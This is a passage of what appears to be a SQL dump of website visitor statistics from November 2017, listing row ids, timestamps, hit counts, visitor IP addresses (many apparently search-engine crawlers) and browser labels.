2,0,0,'46.229.168.78','other'),(177301,1510609322,1,1,0,0,'217.182.132.81','other'),(177302,1510609371,3,3,0,0,'46.229.168.69','other'),(177303,1510609626,3,3,0,0,'46.229.168.76','other'),(177304,1510609666,10,10,0,0,'46.229.168.71','other'),(177305,1510609689,4,4,0,0,'46.229.168.66','other'),(177306,1510609690,1,1,0,0,'37.9.113.80','other'),(177307,1510609736,4,4,0,0,'46.229.168.70','other'),(177308,1510609806,4,4,0,0,'46.229.168.73','other'),(177309,1510609829,1,1,0,0,'37.9.113.63','other'),(177310,1510609865,4,4,0,0,'46.229.168.75','other'),(177311,1510609917,7,7,0,0,'46.229.168.79','other'),(177312,1510609922,1,1,0,0,'217.69.134.154','other'),(177313,1510610169,1,1,0,0,'178.154.200.28','other'),(177314,1510610224,5,5,0,0,'46.229.168.72','other'),(177315,1510610260,3,3,0,0,'46.229.168.78','other'),(177316,1510610278,4,4,0,0,'46.229.168.68','other'),(177317,1510610295,1,1,0,0,'51.255.65.56','other'),(177318,1510610358,1,1,0,0,'164.132.162.160','other'),(177319,1510610558,3,3,0,0,'46.229.168.65','other'),(177320,1510610595,4,4,0,0,'46.229.168.76','other'),(177321,1510610628,3,3,0,0,'46.229.168.74','other'),(177322,1510610701,1,1,0,0,'46.229.168.71','other'),(177323,1510610707,1,1,0,0,'51.255.65.37','other'),(177324,1510610721,1,1,0,0,'164.132.162.164','other'),(177325,1510610774,3,3,0,0,'46.229.168.77','other'),(177326,1510610822,3,3,0,0,'46.229.168.70','other'),(177327,1510610843,7,7,0,0,'46.229.168.80','other'),(177328,1510610900,3,3,0,0,'46.229.168.66','other'),(177329,1510610951,3,3,0,0,'46.229.168.79','other'),(177330,1510611007,5,5,0,0,'46.229.168.75','other'),(177331,1510611030,2,2,0,0,'37.9.113.56','other'),(177332,1510611080,6,6,0,0,'46.229.168.73','other'),(177333,1510611136,4,4,0,0,'46.229.168.69','other'),(177334,1510611215,4,4,0,0,'46.229.168.72','other'),(177335,1510611252,8,8,0,0,'46.229.168.67','other'),(177336,1510611317,1,1,0,0,'217.182.132.157','other'),(177337,1510611427,1,1,0,0,'46.229.168.78','other'),(177338,1510611557,3,3,0,0,'46.229.168.68','other'),(177339,1510611569,1,1,0,0,'46.161.9.55','chrome'),(177340,1510611620,4,4,0,0,'46.229.168.76','other'),(177341,1510611629,1,1,0,0,'40.77.167.56','other'),(177342,1510611688,4,4,0,0,'46.229.168.77','other'),(177343,1510611696,5,5,0,0,'46.229.168.65','other'),(177344,1510611712,5,5,0,0,'46.229.168.71','other'),(177345,1510611758,6,6,0,0,'46.229.168.70','other'),(177346,1510611859,7,7,0,0,'46.229.168.79','other'),(177347,1510611860,1,1,0,0,'137.74.207.110','other'),(177348,1510611885,1,1,0,0,'141.8.142.96','other'),(177349,1510611900,1,1,0,0,'137.74.201.108','other'),(177350,1510611908,6,6,0,0,'46.229.168.66','other'),(177351,1510611947,2,2,0,0,'46.229.168.75','other'),(177352,1510612039,6,6,0,0,'46.229.168.74','other'),(177353,1510612240,8,8,0,0,'46.229.168.80','other'),(177354,1510612307,7,7,0,0,'46.229.168.67','other'),(177355,1510612346,2,2,0,0,'46.229.168.69','other'),(177356,1510612382,1,1,0,0,'141.8.142.74','other'),(177357,1510612463,6,6,0,0,'46.229.168.73','other'),(177358,1510612734,2,2,0,0,'46.229.168.78','other'),(177359,1510612779,5,5,0,0,'46.229.168.72','other'),(177360,1510612817,4,4,0,0,'46.229.168.66','other'),(177361,1510612856,3,3,0,0,'46.229.168.76','other'),(177362,1510612875,6,6,0,0,'46.229.168.71','other'),(177363,1510612915,8,8,0,0,'46.229.168.79','other'),(177364,1510612919,1,1,0,0,'178.154.171.24','other'),(177365,1510612928,1,1,0,0,'5.45.207.82','other'),(177366,1510612934,2,2,0,0,'46.229.168.75','other'),(177367,1510613081,6,6,0,0,'46.229.168.68','other'),(177368,1510613169,6,6,0,0,'46.229.168.77','other'),(177369,1510613171,1,1,0,0,'51.255.71.133','other'),(177370,1510613180,1,1,0,0,'95.108.213.24','other'),(177371,1510613281,1,1,0,0,'46.229.168.80','other'),(177372,1510613340,1,1,0,0,'217.182.132.54','other'),(177373,1510613359,1,1,0,0,'5.45.207.83','other'),(177374,1510613445,2,2,0,0,'46.229.168.65','other'),(177375,1510613501,1,1,0,0,'46.229.168.73','other'),(177376,1510613547,1,1,0,0,'46.229.168.74','other'),(177377,1510613644,2,2,0,0,'46.229.168.67','other'),(177378,1510613683,1,1,0,0,'46.229.168.70','other'),(177379,1510613688,1,1,0,0,'91.209.11.236','other'),(177380,1510613785,1,1,0,0,'46.229.168.66','other'),(177381,1510613809,2,2,0,0,'46.229.168.78','other'),(177382,1510614039,2,0,2,0,'66.249.64.28',''),(177383,1510614453,1,1,0,0,'216.244.66.237','other'),(177384,1510614744,1,1,0,0,'8.29.198.26','other'),(177385,1510615039,2,1,1,0,'66.249.70.29',''),(177386,1510615040,1,1,0,0,'5.45.207.82','other'),(177387,1510615138,1,0,1,0,'66.249.70.27',''),(177388,1510615174,2,1,1,0,'66.249.64.30',''),(177389,1510615669,1,1,0,0,'37.9.113.132','other'),(177390,1510615768,1,1,0,0,'51.255.65.12','other'),(177391,1510616170,1,1,0,0,'37.9.113.110','other'),(177392,1510616173,1,1,0,0,'87.250.224.85','other'),(177393,1510616337,8,8,0,0,'144.76.8.231','other'),(177394,1510616664,1,0,1,0,'66.249.64.28',''),(177395,1510617148,1,1,0,0,'35.184.189.105','other'),(177396,1510617275,1,1,0,0,'180.76.15.153','other'),(177397,1510617666,1,1,0,0,'157.55.39.145','other'),(177398,1510617857,1,1,0,0,'137.74.207.116','other'),(177399,1510617897,1,1,0,0,'217.182.132.29','other'),(177400,1510618554,1,0,1,0,'66.249.76.107',''),(177401,1510618648,1,0,1,0,'66.249.66.157',''),(177402,1510618879,1,1,0,0,'51.255.65.30','other'),(177403,1510619131,1,1,0,0,'217.182.132.88','other'),(177404,1510619275,1,1,0,0,'180.76.15.134','other'),(177405,1510619282,1,1,0,0,'164.132.162.159','other'),(177406,1510619556,4,4,0,0,'173.249.5.35','other'),(177407,1510619805,1,1,0,0,'51.255.65.82','other'),(177408,1510619977,1,1,0,0,'137.74.207.170','other'),(177409,1510620697,1,1,0,0,'164.132.162.159','other'),(177410,1510621068,1,1,0,0,'51.255.65.47','other'),(177411,1510621220,1,1,0,0,'51.255.65.82','other'),(177412,1510622081,1,1,0,0,'51.255.65.79','other'),(177413,1510622725,1,1,0,0,'180.76.15.159','other'),(177414,1510623245,1,1,0,0,'137.74.207.120','other'),(177415,1510624010,1,1,0,0,'137.74.207.164','other'),(177416,1510625333,1,1,0,0,'217.182.132.51','other'),(177417,1510625353,1,1,0,0,'51.255.71.114','other'),(177418,1510625577,1,1,0,0,'217.182.132.52','other'),(177419,1510625586,1,1,0,0,'8.29.198.27','other'),(177420,1510625672,1,1,0,0,'217.182.132.153','other'),(177421,1510625786,1,1,0,0,'217.182.132.67','other'),(177422,1510625897,1,1,0,0,'164.132.162.158','other'),(177423,1510625978,1,0,1,0,'66.249.76.107',''),(177424,1510625987,1,1,0,0,'51.255.65.90','other'),(177425,1510626062,1,1,0,0,'217.182.132.184','other'),(177426,1510626776,1,1,0,0,'51.255.65.18','other'),(177427,1510626956,1,1,0,0,'35.184.189.105','other'),(177428,1510627121,1,1,0,0,'157.55.39.194','other'),(177429,1510627292,1,1,0,0,'5.45.207.83','other'),(177430,1510627293,1,1,0,0,'87.250.224.85','other'),(177431,1510627331,1,1,0,0,'217.182.132.180','other'),(177432,1510627465,1,1,0,0,'217.182.132.84','other'),(177433,1510628303,1,1,0,0,'51.255.71.129','other'),(177434,1510629191,1,1,0,0,'217.182.132.173','other'),(177435,1510629224,1,1,0,0,'51.255.71.116','other'),(177436,1510629721,1,1,0,0,'217.182.132.69','other'),(177437,1510630163,1,1,0,0,'164.132.162.158','other'),(177438,1510630423,1,1,0,0,'217.182.132.66','other'),(177439,1510630589,1,1,0,0,'51.255.71.101','other'),(177440,1510630769,1,1,0,0,'217.182.132.93','other'),(177441,1510631963,1,1,0,0,'51.255.65.80','other'),(177442,1510632845,1,1,0,0,'51.255.65.95','other'),(177443,1510632964,1,1,0,0,'217.182.132.77','other'),(177444,1510633383,1,1,0,0,'51.255.65.20','other'),(177445,1510633659,1,1,0,0,'217.182.132.56','other'),(177446,1510634322,1,1,0,0,'157.55.39.229','other'),(177447,1510634384,1,1,0,0,'51.255.65.13','other'),(177448,1510634903,1,0,1,0,'66.249.76.107',''),(177449,1510635111,1,1,0,0,'217.182.132.88','other'),(177450,1510635268,1,1,0,0,'217.182.132.35','other'),(177451,1510635784,1,1,0,0,'51.255.65.53','other'),(177452,1510636226,1,0,1,0,'66.249.76.108',''),(177453,1510636420,1,1,0,0,'8.29.198.26','other'),(177454,1510636576,1,1,0,0,'217.182.132.179','other'),(177455,1510636764,1,1,0,0,'178.154.200.32','other'),(177456,1510637481,1,1,0,0,'51.255.65.3','other'),(177457,1510637698,1,1,0,0,'51.255.65.74','other'),(177458,1510637793,1,1,0,0,'66.249.76.109','chrome'),(177459,1510638352,1,1,0,0,'51.255.65.84','other'),(177460,1510638576,1,1,0,0,'141.8.142.74','other'),(177461,1510638812,1,1,0,0,'157.55.39.229','other'),(177462,1510639236,1,0,1,0,'66.249.66.156',''),(177463,1510640122,1,1,0,0,'217.182.132.186','other'),(177464,1510640135,1,0,1,0,'66.249.76.108',''),(177465,1510640288,1,1,0,0,'51.255.71.132','other'),(177466,1510640836,1,1,0,0,'51.255.65.17','other'),(177467,1510641310,1,1,0,0,'54.165.59.7','other'),(177468,1510641461,1,1,0,0,'91.229.121.3','firefox'),(177469,1510641636,1,1,0,0,'51.255.65.87','other'),(177470,1510641964,1,1,0,0,'91.196.178.67','chrome'),(177471,1510642174,1,1,0,0,'91.196.178.99','chrome'),(177472,1510642301,2,2,0,0,'54.165.59.7','other'),(177473,1510642320,1,1,0,0,'216.244.66.237','other'),(177474,1510642325,1,1,0,0,'91.196.178.72','chrome'),(177475,1510642890,1,0,1,0,'66.249.76.108',''),(177476,1510643088,1,1,0,0,'51.255.65.12','other'),(177477,1510643145,2,2,0,0,'178.154.200.32','other'),(177478,1510643251,1,1,0,0,'107.167.104.32','other'),(177479,1510643298,1,1,0,0,'91.196.178.167','firefox'),(177480,1510643626,1,1,0,0,'51.255.65.59','other'),(177481,1510643893,1,0,1,0,'66.249.66.75',''),(177482,1510644177,1,1,0,0,'217.182.132.75','other'),(177483,1510644296,1,1,0,0,'91.196.178.65','chrome'),(177484,1510644297,1,1,0,0,'216.244.66.237','other'),(177485,1510644486,2,2,0,0,'178.154.171.88','other'),(177486,1510644597,11,11,0,0,'62.149.15.172','chrome'),(177487,1510644617,1,1,0,0,'141.8.142.74','other'),(177488,1510644764,1,0,1,0,'66.249.76.109',''),(177489,1510644929,1,1,0,0,'51.255.65.46','other'),(177490,1510645421,1,1,0,0,'139.59.44.64','chrome'),(177491,1510645655,1,1,0,0,'188.166.79.218','chrome'),(177492,1510646551,1,1,0,0,'217.182.132.50','other'),(177493,1510646751,1,1,0,0,'217.182.132.80','other'),(177494,1510646970,1,1,0,0,'141.8.132.19','other'),(177495,1510647261,1,1,0,0,'8.29.198.26','other'),(177496,1510647310,1,1,0,0,'194.1.195.225','chrome'),(177497,1510647369,1,1,0,0,'37.52.156.115','chrome'),(177498,1510647812,2,2,0,0,'216.244.66.246','other'),(177499,1510648039,1,1,0,0,'217.182.132.57','other'),(177500,1510648169,2,2,0,0,'142.4.200.37','other'),(177501,1510648323,1,1,0,0,'51.255.65.52','other'),(177502,1510648356,1,1,0,0,'194.44.130.236','chrome'),(177503,1510648378,1,1,0,0,'51.255.65.13','other'),(177504,1510648522,1,1,0,0,'51.255.65.95','other'),(177505,1510648550,1,1,0,0,'51.255.65.64','other'),(177506,1510648630,1,1,0,0,'199.30.25.114','other'),(177507,1510648674,1,1,0,0,'178.95.245.32','chrome'),(177508,1510648760,1,1,0,0,'178.154.200.7','other'),(177509,1510649319,1,1,0,0,'217.182.132.180','other'),(177510,1510649393,1,0,1,0,'66.249.76.107',''),(177511,1510649425,1,1,0,0,'217.182.132.5','other'),(177512,1510650017,1,1,0,0,'51.255.65.53','other'),(177513,1510650206,1,1,0,0,'91.196.178.65','chrome'),(177514,1510650269,1,1,0,0,'66.249.66.157','chrome'),(177515,1510650274,1,1,0,0,'66.249.66.76','chrome'),(177516,1510650356,1,0,1,0,'66.249.66.75',''),(177517,1510650547,1,1,0,0,'217.182.132.192','other'),(177518,1510650685,1,0,1,0,'66.249.76.109',''),(177519,1510650795,1,1,0,0,'217.182.132.34','other'),(177520,1510650964,1,1,0,0,'51.255.65.26','other'),(177521,1510651305,1,1,0,0,'46.201.243.191','chrome'),(177522,1510651368,1,0,1,0,'66.249.76.107',''),(177523,1510651657,1,1,0,0,'51.255.65.3','other'),(177524,1510651750,1,1,0,0,'91.196.178.65','chrome'),(177525,1510651821,1,1,0,0,'91.196.178.67','firefox'),(177526,1510652424,1,1,0,0,'216.244.66.194','other'),(177527,1510652506,1,1,0,0,'165.227.151.134','chrome'),(177528,1510652625,1,1,0,0,'37.53.231.102','chrome'),(177529,1510652867,1,1,0,0,'51.255.65.94','other'),(177530,1510653777,1,1,0,0,'51.255.65.79','other'),(177531,1510653920,1,1,0,0,'217.182.132.36','other'),(177532,1510654040,2,2,0,0,'87.250.224.46','other'),(177533,1510654054,1,1,0,0,'51.255.65.68','other'),(177534,1510654238,1,1,0,0,'217.182.132.17','other'),(177535,1510654667,1,1,0,0,'95.134.203.182','firefox'),(177536,1510654950,1,1,0,0,'137.74.207.108','other'),(177537,1510655085,1,1,0,0,'217.182.132.73','other'),(177538,1510655134,1,1,0,0,'91.196.178.65','chrome'),(177539,1510655527,1,1,0,0,'91.196.178.67','firefox'),(177540,1510655716,1,1,0,0,'51.255.65.74','other'),(177541,1510656425,1,1,0,0,'217.182.132.20','other'),(177542,1510656538,1,1,0,0,'217.182.132.33','other'),(177543,1510656555,1,1,0,0,'216.244.66.246','other'),(177544,1510656808,1,1,0,0,'217.182.132.240','other'),(177545,1510656818,1,1,0,0,'176.122.120.75','chrome'),(177546,1510656838,1,0,1,0,'66.249.66.157',''),(177547,1510656970,1,1,0,0,'178.154.171.88','other'),(177548,1510657103,1,1,0,0,'37.9.113.100','other'),(177549,1510657278,1,1,0,0,'91.196.178.104','chrome'),(177550,1510657535,1,1,0,0,'37.9.113.115','other'),(177551,1510658044,1,1,0,0,'5.45.207.58','other'),(177552,1510658102,1,1,0,0,'8.29.198.25','other'),(177553,1510658310,1,1,0,0,'51.255.65.31','other'),(177555,1510658381,1,0,1,0,'66.249.76.107',''),(177556,1510658494,1,1,0,0,'213.180.203.40','other'),(177557,1510659156,1,1,0,0,'46.219.236.28','chrome'),(177558,1510659231,1,0,1,0,'66.249.76.109',''),(177559,1510659435,1,1,0,0,'178.154.171.10','other'),(177560,1510659458,1,1,0,0,'94.156.144.191','firefox'),(177561,1510659527,1,1,0,0,'216.244.66.194','other'),(177562,1510659647,1,1,0,0,'51.255.65.87','other'),(177563,1510660022,10,10,0,0,'94.154.239.69','other'),(177564,1510660053,1,1,0,0,'217.182.132.18','other'),(177565,1510660428,1,1,0,0,'37.9.113.182','other'),(177566,1510660823,1,0,1,0,'66.249.76.89',''),(177567,1510660893,1,1,0,0,'66.249.76.109','chrome'),(177568,1510660910,1,1,0,0,'66.249.66.74','chrome'),(177569,1510661010,1,1,0,0,'217.182.132.170','other'),(177570,1510661112,1,1,0,0,'217.182.132.74','other'),(177571,1510661476,1,1,0,0,'37.9.113.101','other'),(177572,1510663054,1,0,1,0,'66.249.76.108',''),(177573,1510663392,1,1,0,0,'141.8.142.74','other'),(177574,1510663589,1,1,0,0,'217.182.132.69','other'),(177575,1510663740,1,1,0,0,'178.154.171.10','other'),(177576,1510664307,2,2,0,0,'37.9.113.182','other'),(177577,1510664953,1,1,0,0,'91.236.184.19','chrome'),(177578,1510665103,1,1,0,0,'51.255.65.85','other'),(177579,1510665164,1,1,0,0,'51.255.65.96','other'),(177580,1510665300,1,0,1,0,'66.249.76.109',''),(177581,1510665417,1,1,0,0,'157.55.39.229','other'),(177582,1510665573,1,1,0,0,'178.154.171.81','other'),(177583,1510665720,3,3,0,0,'216.244.66.246','other'),(177584,1510665933,1,1,0,0,'91.196.178.166','chrome'),(177585,1510666023,1,1,0,0,'216.244.66.237','other'),(177586,1510666354,1,1,0,0,'91.196.178.65','chrome'),(177587,1510666442,1,1,0,0,'178.154.171.88','other'),(177588,1510666593,1,1,0,0,'91.209.11.236','other'),(177589,1510666647,1,1,0,0,'217.182.132.170','other'),(177590,1510666944,1,1,0,0,'66.249.76.109','chrome'),(177591,1510667509,1,1,0,0,'51.255.65.52','other'),(177592,1510668063,1,1,0,0,'217.182.132.31','other'),(177593,1510668167,1,1,0,0,'5.45.207.83','other'),(177594,1510668253,1,1,0,0,'217.182.132.5','other'),(177595,1510668256,1,1,0,0,'217.182.132.52','other'),(177596,1510668392,1,1,0,0,'217.182.132.85','other'),(177597,1510668419,1,1,0,0,'178.154.171.88','other'),(177598,1510668591,1,1,0,0,'180.76.15.162','other'),(177599,1510668797,1,1,0,0,'212.113.42.186','firefox'),(177600,1510668938,1,1,0,0,'8.29.198.26','other'),(177601,1510669070,1,0,1,0,'66.249.76.109',''),(177602,1510669267,1,1,0,0,'51.255.65.62','other'),(177603,1510669545,1,1,0,0,'217.182.132.183','other'),(177604,1510670016,2,0,2,0,'66.249.76.93',''),(177605,1510670020,2,1,1,0,'66.249.76.109',''),(177606,1510670024,2,2,0,0,'66.249.76.91','chrome'),(177607,1510670025,1,1,0,0,'51.255.65.20','other'),(177608,1510670228,1,1,0,0,'51.255.65.46','other'),(177609,1510670306,2,1,1,0,'66.249.76.107',''),(177610,1510670340,3,1,2,0,'66.249.76.109',''),(177611,1510670777,1,1,0,0,'51.255.65.76','other'),(177612,1510670826,1,1,0,0,'217.182.132.193','other'),(177613,1510670958,1,1,0,0,'217.182.132.34','other'),(177614,1510671066,1,0,1,0,'66.249.66.157',''),(177615,1510671086,1,1,0,0,'37.9.113.138','other'),(177616,1510671221,1,1,0,0,'141.8.142.74','other'),(177617,1510671325,1,1,0,0,'35.184.189.105','other'),(177618,1510671398,1,1,0,0,'80.254.155.43','chrome'),(177619,1510671704,1,1,0,0,'213.180.203.7','other'),(177620,1510671790,6,6,0,0,'91.209.51.22','other'),(177621,1510672021,1,1,0,0,'217.182.132.183','other'),(177622,1510672207,1,1,0,0,'217.182.132.84','other'),(177623,1510672258,1,0,1,0,'66.249.76.91',''),(177624,1510672625,1,1,0,0,'141.8.142.74','other'),(177625,1510672775,1,1,0,0,'91.196.178.71','firefox'),(177626,1510672906,1,0,1,0,'66.249.76.108',''),(177627,1510673040,1,1,0,0,'37.9.113.182','other'),(177628,1510673310,1,1,0,0,'151.80.27.116','other'),(177629,1510673439,1,1,0,0,'51.255.65.32','other'),(177630,1510673947,1,0,1,0,'66.249.76.109',''),(177631,1510674035,1,1,0,0,'51.255.71.117','other'),(177632,1510674366,2,2,0,0,'216.244.66.246','other'),(177633,1510674500,1,1,0,0,'51.255.65.83','other'),(177634,1510674812,1,1,0,0,'51.255.65.62','other'),(177635,1510674845,1,0,1,0,'66.249.76.89',''),(177636,1510675018,1,1,0,0,'178.154.171.55','other'),(177637,1510675334,1,1,0,0,'164.132.162.160','other'),(177638,1510675482,1,1,0,0,'66.249.66.157','chrome'),(177639,1510675487,2,1,1,0,'66.249.76.89',''),(177640,1510675578,1,1,0,0,'217.182.132.182','other'),(177641,1510675680,1,1,0,0,'213.180.203.7','other'),(177642,1510675782,1,1,0,0,'94.156.144.191','firefox'),(177643,1510676022,1,1,0,0,'51.255.71.117','other'),(177644,1510676452,1,1,0,0,'5.45.207.83','other'),(177645,1510677130,1,1,0,0,'51.255.65.92','other'),(177646,1510677393,1,1,0,0,'178.154.171.56','other'),(177647,1510677432,1,1,0,0,'90.154.92.6','chrome'),(177648,1510678364,1,1,0,0,'37.9.113.101','other'),(177649,1510678631,1,1,0,0,'91.196.178.39','chrome'),(177650,1510678634,1,0,1,0,'66.249.76.91',''),(177651,1510678650,1,1,0,0,'51.255.65.22','other'),(177652,1510678692,1,1,0,0,'37.9.113.80','other'),(177653,1510678846,1,1,0,0,'193.107.130.214','chrome'),(177654,1510678877,1,1,0,0,'5.45.207.49','other'),(177655,1510678965,1,1,0,0,'157.55.39.229','other'),(177656,1510679039,1,1,0,0,'51.255.65.70','other'),(177657,1510679772,1,1,0,0,'8.29.198.25','other'),(177658,1510680082,1,1,0,0,'217.182.132.77','other'),(177659,1510680775,1,1,0,0,'217.182.132.14','other'),(177660,1510680831,4,4,0,0,'69.30.205.218','other'),(177661,1510681421,2,2,0,0,'216.244.66.246','other'),(177662,1510681964,1,1,0,0,'37.73.254.136','chrome'),(177663,1510682455,1,1,0,0,'178.154.200.32','other'),(177664,1510682603,1,1,0,0,'37.9.113.132','other'),(177665,1510682633,1,1,0,0,'95.108.213.24','other'),(177666,1510682860,1,1,0,0,'141.8.132.19','other'),(177667,1510683480,1,1,0,0,'66.249.66.217','chrome'),(177668,1510683613,2,1,1,0,'66.249.66.16',''),(177669,1510683757,1,1,0,0,'51.255.65.28','other'),(177670,1510683938,2,2,0,0,'5.45.207.69','other'),(177671,1510684780,1,1,0,0,'141.8.142.29','other'),(177672,1510685051,1,1,0,0,'178.154.200.7','other'),(177673,1510685181,1,1,0,0,'178.154.171.81','other'),(177674,1510685236,1,1,0,0,'51.255.71.122','other'),(177675,1510685836,1,1,0,0,'188.166.68.105','chrome'),(177676,1510685861,1,1,0,0,'51.255.65.36','other'),(177677,1510686131,1,1,0,0,'157.55.39.145','other'),(177678,1510686221,1,1,0,0,'141.8.142.74','other'),(177679,1510687691,1,1,0,0,'51.255.65.3','other'),(177680,1510687886,1,1,0,0,'95.132.105.119','chrome'),(177681,1510688130,1,1,0,0,'216.244.66.246','other'),(177682,1510688217,1,1,0,0,'51.255.65.52','other'),(177683,1510688817,1,1,0,0,'54.165.59.7','other'),(177684,1510689778,1,1,0,0,'217.182.132.68','other'),(177685,1510690305,1,1,0,0,'146.185.223.221','firefox'),(177686,1510690413,1,1,0,0,'178.154.171.88','other'),(177687,1510690608,1,1,0,0,'8.29.198.25','other'),(177688,1510691115,1,1,0,0,'54.196.108.99','other'),(177689,1510691382,1,1,0,0,'217.182.132.66','other'),(177690,1510691734,1,1,0,0,'141.8.142.74','other'),(177691,1510692156,1,0,1,0,'66.249.76.108',''),(177692,1510692213,1,1,0,0,'199.58.86.211','other'),(177693,1510692246,1,1,0,0,'37.9.113.110','other'),(177694,1510692445,1,1,0,0,'37.9.113.182','other'),(177695,1510692489,4,4,0,0,'87.250.224.46','other'),(177696,1510692839,1,1,0,0,'51.255.65.24','other'),(177697,1510693492,1,1,0,0,'141.8.142.74','other'),(177698,1510693556,1,1,0,0,'217.182.132.77','other'),(177699,1510694164,1,1,0,0,'157.55.39.37','other'),(177700,1510694293,1,1,0,0,'51.255.65.75','other'),(177701,1510694373,1,1,0,0,'37.9.113.182','other'),(177702,1510694665,1,1,0,0,'51.255.65.83','other'),(177703,1510695299,1,1,0,0,'178.154.171.88','other'),(177704,1510695463,5,5,0,0,'158.69.252.176','other'),(177705,1510695729,1,1,0,0,'217.182.132.185','other'),(177706,1510695766,1,1,0,0,'87.250.224.96','other'),(177707,1510695866,1,1,0,0,'216.244.66.246','other'),(177708,1510696096,1,1,0,0,'217.182.132.52','other'),(177709,1510696303,1,1,0,0,'141.8.132.19','other'),(177710,1510696509,1,1,0,0,'51.255.65.56','other'),(177711,1510696663,2,2,0,0,'141.8.142.74','other'),(177712,1510697004,1,1,0,0,'217.182.132.73','other'),(177713,1510697345,2,2,0,0,'178.154.171.88','other'),(177714,1510697413,1,1,0,0,'216.244.66.237','other'),(177715,1510697740,1,0,1,0,'66.249.66.18',''),(177716,1510697847,1,1,0,0,'141.8.132.19','other'),(177717,1510698104,1,1,0,0,'217.182.132.54','other'),(177718,1510698333,1,1,0,0,'87.250.224.46','other'),(177719,1510698691,1,1,0,0,'217.69.136.210','other'),(177720,1510698864,1,1,0,0,'164.132.162.164','other'),(177721,1510699115,1,1,0,0,'51.255.65.51','other'),(177722,1510699429,1,1,0,0,'87.250.224.46','other'),(177723,1510699496,1,1,0,0,'37.9.113.182','other'),(177724,1510700011,1,1,0,0,'178.137.193.220','chrome'),(177725,1510700021,1,1,0,0,'157.55.39.229','other'),(177726,1510700270,2,2,0,0,'157.55.39.194','other'),(177727,1510700826,1,1,0,0,'217.182.132.35','other'),(177728,1510701200,1,1,0,0,'91.196.178.164','chrome'),(177729,1510701245,1,0,1,0,'66.249.66.16',''),(177730,1510701438,1,1,0,0,'8.29.198.25','other'),(177731,1510701690,1,1,0,0,'178.200.62.165','other'),(177732,1510702050,1,1,0,0,'137.74.203.194','other'),(177733,1510702084,1,1,0,0,'51.255.65.59','other'),(177734,1510702172,1,1,0,0,'178.93.148.49','chrome'),(177735,1510702838,1,1,0,0,'217.69.136.203','other'),(177736,1510703467,1,1,0,0,'137.74.207.110','other'),(177737,1510703981,1,1,0,0,'51.255.65.67','other'),(177738,1510704015,1,0,1,0,'66.249.76.91',''),(177739,1510704723,1,1,0,0,'87.250.224.85','other'),(177740,1510704727,1,1,0,0,'178.154.200.7','other'),(177741,1510705635,1,1,0,0,'66.249.76.89','chrome'),(177742,1510705694,1,1,0,0,'66.249.76.61','chrome'),(177743,1510705920,1,1,0,0,'51.255.64.106','other'),(177744,1510706126,1,1,0,0,'216.244.66.194','other'),(177745,1510706632,1,1,0,0,'37.9.113.182','other'),(177746,1510707033,1,1,0,0,'194.28.172.81','chrome'),(177747,1510707515,1,1,0,0,'37.9.113.56','other'),(177748,1510708823,1,1,0,0,'54.224.168.206','other'),(177749,1510709462,1,1,0,0,'51.255.65.47','other'),(177750,1510709562,1,1,0,0,'51.255.65.91','other'),(177751,1510710318,1,1,0,0,'217.182.132.36','other'),(177752,1510710448,1,1,0,0,'216.244.66.194','other'),(177753,1510710817,1,1,0,0,'217.69.133.231','other'),(177754,1510711262,1,1,0,0,'66.249.76.91','chrome'),(177755,1510711292,1,1,0,0,'66.249.76.62','chrome'),(177756,1510712131,1,1,0,0,'217.182.132.149','other'),(177757,1510712215,1,1,0,0,'51.255.65.11','other'),(177758,1510712270,1,1,0,0,'8.29.198.25','other'),(177759,1510712385,1,1,0,0,'217.182.132.65','other'),(177760,1510713135,1,1,0,0,'54.224.168.206','other'),(177761,1510713767,1,1,0,0,'151.80.203.177','chrome'),(177762,1510715234,1,1,0,0,'217.182.132.83','other'),(177763,1510716108,1,1,0,0,'217.182.132.94','other'),(177764,1510716502,1,1,0,0,'54.224.168.206','other'),(177765,1510716685,1,1,0,0,'66.249.76.93','chrome'),(177766,1510716699,1,1,0,0,'51.255.65.20','other'),(177767,1510716705,1,1,0,0,'66.249.76.60','chrome'),(177768,1510717338,1,1,0,0,'217.182.132.188','other'),(177769,1510719299,1,1,0,0,'216.244.66.237','other'),(177770,1510719438,1,1,0,0,'216.244.66.194','other'),(177771,1510720135,1,1,0,0,'128.69.227.198','msie'),(177772,1510722817,1,1,0,0,'216.244.66.237','other'),(177773,1510723104,1,1,0,0,'8.29.198.25','other'),(177774,1510723474,2,2,0,0,'54.81.201.49','other'),(177775,1510724555,1,1,0,0,'216.244.66.237','other'),(177776,1510724782,1,1,0,0,'91.196.177.46','firefox'),(177777,1510725231,3,3,0,0,'54.81.201.49','other'),(177778,1510725240,1,1,0,0,'51.255.65.71','other'),(177779,1510725281,1,1,0,0,'51.255.71.122','other'),(177780,1510726338,1,1,0,0,'217.182.132.34','other'),(177781,1510726360,4,4,0,0,'54.81.201.49','other'),(177782,1510726727,1,1,0,0,'216.244.66.194','other'),(177783,1510727304,1,1,0,0,'217.182.132.24','other'),(177784,1510727320,1,1,0,0,'217.182.132.96','other'),(177785,1510727409,1,1,0,0,'217.182.132.28','other'),(177786,1510727577,3,3,0,0,'54.81.201.49','other'),(177787,1510727703,1,1,0,0,'216.244.66.246','other'),(177788,1510727798,1,1,0,0,'51.255.65.94','other'),(177789,1510728311,1,1,0,0,'51.255.65.75','other'),(177790,1510728571,1,1,0,0,'91.196.177.46','chrome'),(177791,1510728700,1,1,0,0,'217.182.132.151','other'),(177792,1510729066,1,1,0,0,'91.196.178.72','chrome'),(177793,1510729371,1,1,0,0,'51.255.65.30','other'),(177794,1510729668,1,1,0,0,'91.196.178.65','chrome'),(177795,1510730806,3,3,0,0,'54.81.201.49','other'),(177796,1510731971,2,2,0,0,'51.255.71.117','other'),(177797,1510732044,6,6,0,0,'54.81.201.49','other'),(177798,1510732242,1,1,0,0,'213.180.203.40','other'),(177799,1510732343,1,1,0,0,'216.244.66.246','other'),(177800,1510732404,1,1,0,0,'37.9.113.101','other'),(177801,1510732697,1,1,0,0,'51.255.65.36','other'),(177802,1510733155,3,3,0,0,'54.81.201.49','other'),(177803,1510733575,1,1,0,0,'87.250.224.66','other'),(177804,1510734058,3,3,0,0,'54.81.201.49','other'),(177805,1510734059,1,1,0,0,'8.29.198.26','other'),(177806,1510734758,1,1,0,0,'216.244.66.194','other'),(177807,1510734837,1,1,0,0,'216.244.66.237','other'),(177808,1510734958,1,1,0,0,'178.95.228.214','chrome'),(177809,1510735035,1,1,0,0,'217.182.132.78','other'),(177810,1510735255,1,1,0,0,'217.182.132.65','other'),(177811,1510735258,2,2,0,0,'54.81.201.49','other'),(177812,1510735390,1,1,0,0,'37.9.113.82','other'),(177813,1510735449,1,1,0,0,'37.55.181.121','chrome'),(177814,1510735739,1,1,0,0,'31.134.208.42','chrome'),(177815,1510737326,1